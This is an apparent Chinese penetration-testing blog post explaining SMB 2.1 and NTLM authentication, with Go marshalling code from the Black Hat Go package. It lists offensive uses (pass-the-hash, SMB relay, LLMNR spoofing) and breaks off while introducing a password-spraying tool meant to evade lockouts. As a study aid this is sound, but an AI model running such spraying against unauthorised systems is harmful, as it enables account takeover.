<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Go渗透测试笔记(六) | h0ld1rs的博客</title><meta name="keywords" content="Golang,渗透测试"><meta name="author" content="h0ld1rs"><meta name="copyright" content="h0ld1rs"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="与SMB和NTLM交互">
<meta property="og:type" content="article">
<meta property="og:title" content="Go渗透测试笔记(六)">
<meta property="og:url" content="https://h0ld1rs.github.io/posts/36907.html">
<meta property="og:site_name" content="h0ld1rs的博客">
<meta property="og:description" content="与SMB和NTLM交互">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://h0ld1rs.github.io/img/image/7.png">
<meta property="article:published_time" content="2022-03-05T03:16:23.000Z">
<meta property="article:modified_time" content="2022-03-05T12:30:57.966Z">
<meta property="article:author" content="h0ld1rs">
<meta property="article:tag" content="Golang,渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://h0ld1rs.github.io/img/image/7.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://h0ld1rs.github.io/posts/36907"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Go渗透测试笔记(六)',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-03-05 20:30:57'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.0.0"><link rel="alternate" href="/atom.xml" title="h0ld1rs的博客" type="application/atom+xml">
</head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/1.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">9</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">3</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 目录</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/image/7.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">h0ld1rs的博客</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 目录</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Go渗透测试笔记(六)</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-03-05T03:16:23.000Z" title="发表于 2022-03-05 11:16:23">2022-03-05</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-03-05T12:30:57.966Z" title="更新于 2022-03-05 20:30:57">2022-03-05</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/Go%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">Go渗透测试</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="Go渗透测试笔记(六)"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-separator">|</span><span class="post-meta-commentcount"><i class="far fa-comments fa-fw post-meta-icon"></i><span class="post-meta-label">评论数:</span><a href="/posts/36907.html#post-comment"><span id="twikoo-count"></span></a></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="Go渗透测试笔记-六-–与SMB和NTLM交互"><a href="#Go渗透测试笔记-六-–与SMB和NTLM交互" class="headerlink" title="Go渗透测试笔记(六)–与SMB和NTLM交互"></a>Go渗透测试笔记(六)–与SMB和NTLM交互</h1><h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>在前面的学习中，我们研究了用于网络通信的三种协议：TCP，HTTP和DNS，这次我们使用<code>SMB(服务器消息块)</code>(Server Message Block)协议来对网络协议进行讨论。<code>SMB</code>被证明是针对<code>Windows</code>系统后渗透中最有用的协议。</p>
<p>SMB具有多种用途，通常用于网上共享资源，例如，文件打印机和串行端口。如果有攻击意识，SMB允许通过命名管道在分布式网络节点之间进行通信。换句话说，你可以在远程主机上执行任意命令。这就需要用到<code>PsExec(一种在本地执行远程命令的windows工具)</code></p>
<p>SMB还有一些其他用途，主要得益于它处理<code>NTLM</code>身份的验证方法，该身份验证是<code>Windows</code>网络上大量使用的<code>质询--响应</code>安全协议。用途包括，远程密码猜测，基于散列的身份验证(pass-the-hash)，SMB中继和<code>NBNS/LLMNR</code>欺骗</p>
<h2 id="0x01-SMB包"><a href="#0x01-SMB包" class="headerlink" title="0x01 SMB包"></a>0x01 SMB包</h2><p>由于没有现成的SMB包，所以使用作者编写的</p>
<p><code>https://github.com/blackhat-go/bhg/tree/master/ch-6/smb</code></p>
<p>改天去挖掘一下源代码</p>
<h2 id="0x02-理解SMB"><a href="#0x02-理解SMB" class="headerlink" title="0x02 理解SMB"></a>0x02 理解SMB</h2><p>SMB是一种应用层协议，它类似于HTTP协议，允许网络节点之间互相通信。与HTTP1.1(使用ASCII 可读写文本进行通信)不同，SMB是一种二进制协议，使用固定长度和可变长度，位置与低字节序字段的组合。SMB有多个版本，2.0，2.1，3.0，3.0.2和3.1.1.由于每个版本的处理方式和要求各不相通，因此客户端和服务器必须事先约定好要使用哪个版本。</p>
<p>其中<code>Windows</code>系统支持多个版本，Microsoft提供了一个表格，显示在协商过程中要安装哪个版本</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220305120724.png"></p>
<p>图片来源：<a target="_blank" rel="noopener" href="https://kb-cn.netapp.com/Advice_and_Troubleshooting/Data_Storage_Software/ONTAP_OS/What_is_the_default_negotiated_SMB_version_with_various_versions_of_Data_ONTAP_and_Windows_clients">https://kb-cn.netapp.com/Advice_and_Troubleshooting/Data_Storage_Software/ONTAP_OS/What_is_the_default_negotiated_SMB_version_with_various_versions_of_Data_ONTAP_and_Windows_clients</a></p>
<p>在这里，我们使用SMB 2.1</p>
<h3 id="1-理解SMB安全令牌"><a href="#1-理解SMB安全令牌" class="headerlink" title="1. 理解SMB安全令牌"></a>1. 理解SMB安全令牌</h3><p>SMB消息包含用于对网络中的用户和计算机进行身份验证的安全令牌。通过一系列会话消息来选择身份认证机制。该消息允许客户端和服务器就相互支持的身份验证类型达成一致。<code>Active Directory</code>域通常使用<code>NTLM</code>安全支持提供程序(NTLMSSP)，后者是一个二进制的网络协议，该协议将<code>NTLM</code>密码散列和<code>质询-响应</code>，令牌结合使用，以便在网络上进行用户的身份认证。</p>
<blockquote>
<p>质询-响应令牌可以理解为一个加密答案，除了NTLMSSP之外，还有一种常见的身份认证机制，即<code>Kerberos</code></p>
</blockquote>
<p>将身份认证机制与SMB规范分开，可以使SMB在不同的环境中使用不同的身份验证方法。具体取决于域和企业的安全要求，以及客户端-服务器的支持。但是，将身份验证机制和SMB规范分开，使Go创建更加困难。而格式与我们将用于普通的SMB的位置二进制编码不同，这种混合编码增加了复杂性。</p>
<h3 id="2-创建一个SMB会话"><a href="#2-创建一个SMB会话" class="headerlink" title="2. 创建一个SMB会话"></a>2. 创建一个SMB会话</h3><p>客户端和服务器执行以下过程以成功设置<code>SMB2.1</code>会话并选择<code>NTLPSSP</code>方言</p>
<ol>
<li><p>客户端向服务器发送协商协议(Negotiate Protocol)请求，该消息中包含客户端支持的方言列表。</p>
</li>
<li><p>服务器以协商协议响应消息作为响应，该消息表明服务器选择的方言，将来的消息都将使用该方言，响应中包含服务器支持的身份验证机制列表。</p>
</li>
<li><p>客户端选择一种受支持的身份验证类型，例如<code>NTLMSSP</code>，并使用该信息创建会话设置请求消息发送到服务器，该消息中包含一个序列化的安全结构，表明他是<code>NTLMSSP</code>协商请求</p>
</li>
<li><p>服务器以会话设置响应消息答复。此消息表明需要更多处理，且此消息中包含服务器质询令牌。</p>
</li>
<li><p>客户端计算用户的<code>NTLM</code>散列值(使用域，用户密码作为输入)，，然后将其与服务器质询，随机客户端质询和其他数据结合起来生成质询响应。它包含在客户端发送给服务器的新会话设置请求消息中。而该消息中包含的序列化的安全结构规则表明其是<code>NTLMSSP</code>身份验证请求。这样，服务器就可以区分两个会话设置<code>SMB</code>请求。</p>
</li>
<li><p>服务器与权威性资源(例如使用域凭据进行身份验证的域控制器)进行交互。以将客户端提供的质询-响应信息与权威性紫泉计算出的值进行比较，如果他们匹配，则对客户端进行身份认证，服务器会话设置响应消息发送给客户端，表示登录成功(该消息中包含客户端，可以用来跟踪会话状态的唯一会话标识符)</p>
</li>
<li><p>客户端发送其他消息以访问文件共享，命名管道，打印机等，每个消息都包含特定的会话标识符，服务器可以通过该标识符来验证客户端的身份状态。</p>
</li>
</ol>
<p>以下是一些相关规范</p>
<blockquote>
<p>MS-SMB2</p>
<p>MS-SPNG 和 RFC 4178 封装了 MS-NLMP数据的<code>GSS-API</code>规范</p>
<p>MS-NTLM</p>
<p>AN&#x3D;SN.1</p>
</blockquote>
<h3 id="3-使用结构域的混合编码"><a href="#3-使用结构域的混合编码" class="headerlink" title="3. 使用结构域的混合编码"></a>3. 使用结构域的混合编码</h3><p>SMB规范要求对大多数消息数据进行位置，二进制，低字节序，固定和可变长度编码。但是某些字段需要进行<code>ASN.1</code>编码，该字段使用显式标记符来标识字段索引，类型和长度。</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Type Foo <span class="keyword">struct</span>&#123;</span><br><span class="line">    x <span class="type">int</span></span><br><span class="line">    y []<span class="type">byte</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">type</span> Message <span class="keyword">struct</span>&#123;</span><br><span class="line">    A <span class="type">int</span> <span class="comment">//二进制，位置编码</span></span><br><span class="line">    B Foo <span class="comment">//规范要求的ASN.1 编码</span></span><br><span class="line">    C <span class="type">bool</span> <span class="comment">// 二进制，位置编码</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>无法使用i相同的编码方案对结构体<code>Message</code>中的所有类型进行编码，因为<code>Foo</code>类型的B字段需要使用<code>ASN.1</code>编码</p>
<h4 id="1-编写自定义的序列化和反序列化结构"><a href="#1-编写自定义的序列化和反序列化结构" class="headerlink" title="1. 编写自定义的序列化和反序列化结构"></a>1. 编写自定义的序列化和反序列化结构</h4><p>Go的二进制包的行为方式与它递归地对所有结构体字段进行编码的方式相同。但没有什么用，因为需要混合编码</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">binary.Write(someWriter,binary.LittleEndian,message)</span><br></pre></td></tr></table></figure>

<p>要解决此问题，可以创建一个接口，该接口允许任意类型的自定义序列化和反序列化逻辑</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> BinaryMarshallable <span class="keyword">interface</span> &#123;</span><br><span class="line">	MarshalBinary(*Metadata) ([]<span class="type">byte</span>, <span class="type">error</span>)</span><br><span class="line">	UnmarshalBinary([]<span class="type">byte</span>, *Metadata) <span class="type">error</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="2-包装接口"><a href="#2-包装接口" class="headerlink" title="2. 包装接口"></a>2. 包装接口</h4><p>任何实现了接口<code>BinaryMarshallable</code>的类型都可以控制自己的编码，我们需要创建包装函数<code>marsgal()</code>和<code>unmarshal()</code>，在其中检查数据以确定该类型是否实现了接口<code>BinaryMarshakkable</code>，</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">marshal</span><span class="params">(v <span class="keyword">interface</span>&#123;&#125;, meta *Metadata)</span></span> ([]<span class="type">byte</span>, <span class="type">error</span>) &#123;</span><br><span class="line">	<span class="keyword">var</span> ret []<span class="type">byte</span></span><br><span class="line">	typev := reflect.TypeOf(v)</span><br><span class="line">	valuev := reflect.ValueOf(v)</span><br><span class="line"></span><br><span class="line">	bm, ok := v.(BinaryMarshallable)</span><br><span class="line">	<span class="keyword">if</span> ok &#123;</span><br><span class="line">		<span class="comment">// Custom marshallable interface found.</span></span><br><span class="line">		buf, err := bm.MarshalBinary(meta)</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> buf, <span class="literal">nil</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> typev.Kind() == reflect.Ptr &#123;</span><br><span class="line">		valuev = reflect.Indirect(reflect.ValueOf(v))</span><br><span class="line">		typev = valuev.Type()</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	w := bytes.NewBuffer(ret)</span><br><span class="line">	<span class="keyword">switch</span> typev.Kind() &#123;</span><br><span class="line">	<span class="keyword">case</span> reflect.Struct:</span><br><span class="line">		m := &amp;Metadata&#123;</span><br><span class="line">			Tags:   &amp;TagMap&#123;&#125;,</span><br><span class="line">			Lens:   <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>),</span><br><span class="line">			Parent: v,</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">for</span> j := <span class="number">0</span>; j &lt; valuev.NumField(); j++ &#123;</span><br><span class="line">			tags, err := parseTags(typev.Field(j))</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			m.Tags = tags</span><br><span class="line">			buf, err := marshal(valuev.Field(j).Interface(), m)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			m.Lens[typev.Field(j).Name] = <span class="type">uint64</span>(<span class="built_in">len</span>(buf))</span><br><span class="line">			<span class="keyword">if</span> err := binary.Write(w, binary.LittleEndian, buf); err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	<span class="keyword">case</span> reflect.Slice, reflect.Array:</span><br><span class="line">		<span class="keyword">switch</span> typev.Elem().Kind() &#123;</span><br><span class="line">		<span class="keyword">case</span> reflect.Uint8:</span><br><span class="line">			<span class="keyword">if</span> err := binary.Write(w, binary.LittleEndian, v.([]<span class="type">uint8</span>)); err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">		<span class="keyword">case</span> reflect.Uint16:</span><br><span class="line">			<span class="keyword">if</span> err := binary.Write(w, binary.LittleEndian, v.([]<span class="type">uint16</span>)); err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	<span class="keyword">case</span> reflect.Uint8:</span><br><span class="line">		<span class="keyword">if</span> err := binary.Write(w, binary.LittleEndian, valuev.Interface().(<span class="type">uint8</span>)); err != <span class="literal">nil</span> &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">		&#125;</span><br><span class="line">	<span class="keyword">case</span> reflect.Uint16:</span><br><span class="line">		data := valuev.Interface().(<span class="type">uint16</span>)</span><br><span class="line">		<span class="keyword">if</span> meta != <span class="literal">nil</span> &amp;&amp; meta.Tags.Has(<span class="string">&quot;len&quot;</span>) &#123;</span><br><span class="line">			fieldName, err := meta.Tags.GetString(<span class="string">&quot;len&quot;</span>)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			l, err := getFieldLengthByName(fieldName, meta)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			data = <span class="type">uint16</span>(l)</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> meta != <span class="literal">nil</span> &amp;&amp; meta.Tags.Has(<span class="string">&quot;offset&quot;</span>) &#123;</span><br><span class="line">			fieldName, err := meta.Tags.GetString(<span class="string">&quot;offset&quot;</span>)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			l, err := getOffsetByFieldName(fieldName, meta)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			data = <span class="type">uint16</span>(l)</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> err := binary.Write(w, binary.LittleEndian, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">		&#125;</span><br><span class="line">	<span class="keyword">case</span> reflect.Uint32:</span><br><span class="line">		data := valuev.Interface().(<span class="type">uint32</span>)</span><br><span class="line">		<span class="keyword">if</span> meta != <span class="literal">nil</span> &amp;&amp; meta.Tags.Has(<span class="string">&quot;len&quot;</span>) &#123;</span><br><span class="line">			fieldName, err := meta.Tags.GetString(<span class="string">&quot;len&quot;</span>)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			l, err := getFieldLengthByName(fieldName, meta)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			data = <span class="type">uint32</span>(l)</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> meta != <span class="literal">nil</span> &amp;&amp; meta.Tags.Has(<span class="string">&quot;offset&quot;</span>) &#123;</span><br><span class="line">			fieldName, err := meta.Tags.GetString(<span class="string">&quot;offset&quot;</span>)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			l, err := getOffsetByFieldName(fieldName, meta)</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">				<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">			&#125;</span><br><span class="line">			data = <span class="type">uint32</span>(l)</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> err := binary.Write(w, binary.LittleEndian, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">		&#125;</span><br><span class="line">	<span class="keyword">case</span> reflect.Uint64:</span><br><span class="line">		<span class="keyword">if</span> err := binary.Write(w, binary.LittleEndian, valuev.Interface().(<span class="type">uint64</span>)); err != <span class="literal">nil</span> &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">		&#125;</span><br><span class="line">	<span class="keyword">default</span>:</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">nil</span>, errors.New(fmt.Sprintf(<span class="string">&quot;Marshal not implemented for kind: %s&quot;</span>, typev.Kind()))</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> w.Bytes(), <span class="literal">nil</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="3-强制ASN-1编码"><a href="#3-强制ASN-1编码" class="headerlink" title="3. 强制ASN.1编码"></a>3. 强制<code>ASN.1</code>编码</h4><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(n *NegTokenInit)</span></span> MarshalBinary(meta *encoder.Metadata) ([]<span class="type">byte</span>, <span class="type">error</span>) &#123;</span><br><span class="line">	buf, err := asn1.Marshal(*n)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		log.Panicln(err)</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>调用<code>asn1.Marshal(*n)</code>适合 go 可以和 asn.1编码与SMB规范定义的基本数据格式配合使用</p>
<h4 id="4-了解元数据和引用字段"><a href="#4-了解元数据和引用字段" class="headerlink" title="4. 了解元数据和引用字段"></a>4. 了解元数据和引用字段</h4><p>SMB规范中可以知道：从协商响应消息端中获取的字段指的是包含实际值的可变长度字节切片的偏移量和长度</p>
<p><code>SecurityBufferOffset(两个字节)</code>：从SMB2标头开始到安全缓冲区的偏移量(以字节为单位)</p>
<p><code>SecurityBufferLength(两个字节)：</code>从安全缓冲区的长度</p>
<h4 id="5-SMB的实现"><a href="#5-SMB的实现" class="headerlink" title="5. SMB的实现"></a>5. SMB的实现</h4><p>这里略过，因为我看不懂</p>
<h2 id="0x03-使用SMB包猜测密码"><a href="#0x03-使用SMB包猜测密码" class="headerlink" title="0x03 使用SMB包猜测密码"></a>0x03 使用SMB包猜测密码</h2><p>现在我们来试一下利用<code>SMB</code>包实施在线密码猜解，我们先下载smb包</p>
<p><code>go get github.com/blackhat-go/bhg/ch-6/smb/smb</code></p>
<p>接下来编写代码，接受保存换行符分割的用户名，密码，域和目标主体，为了避免将账户锁定在某些域之外，我们将尝试对一个用户列表使用同一个密码，而不是对一个或多个用户使用密码列表。</p>
<blockquote>
